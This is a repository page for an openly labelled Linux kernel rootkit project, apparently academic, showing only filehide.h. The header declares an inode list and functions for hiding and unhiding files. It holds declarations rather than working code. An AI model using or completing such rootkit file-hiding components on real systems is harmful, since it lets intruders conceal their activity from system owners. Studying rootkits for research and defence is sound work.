linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

filehide.h (529B)

      1 #ifndef _GROUP7_FILEHIDE_H
      2 #define _GROUP7_FILEHIDE_H
      3 
      4 #include <linux/types.h>
      5 #include <linux/syscalls.h>
      6 #include <linux/list.h>
      7 
      8 typedef struct inode_list *inode_list_t_ptr;
      9 typedef struct inode_list {
     10     unsigned long inode;
     11     inode_list_t_ptr next;
     12 } inode_list_t;
     13 
     14 
     15 void hide_files(void);
     16 void unhide_files(void);
     17 
     18 unsigned long must_hide_inode(struct dentry *);
     19 bool list_contains_inode(inode_list_t_ptr, unsigned long);
     20 inode_list_t_ptr add_inode_to_list(inode_list_t_ptr, unsigned long);
     21 
     22 #endif//_GROUP7_FILEHIDE_H